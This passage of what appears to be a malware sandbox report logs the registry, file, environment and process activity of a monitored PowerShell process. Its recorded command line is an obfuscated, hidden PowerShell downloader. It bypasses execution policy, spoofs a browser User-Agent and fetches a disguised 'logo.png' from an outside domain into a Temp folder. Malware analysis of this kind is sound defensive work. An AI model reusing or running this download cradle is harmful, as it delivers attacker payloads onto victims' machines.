Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (63)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 57
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #42: powershell.exe
477 0
»
Information Value
ID #42
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:01, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:24
OS Process Information
»
Information Value
PID 0xc64
Parent PID 0xb44 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C68
0x C98
0x CB8
0x CC0
0x CD8
0x CE8
0x DD4
Host Behavior
File (131)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (167)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
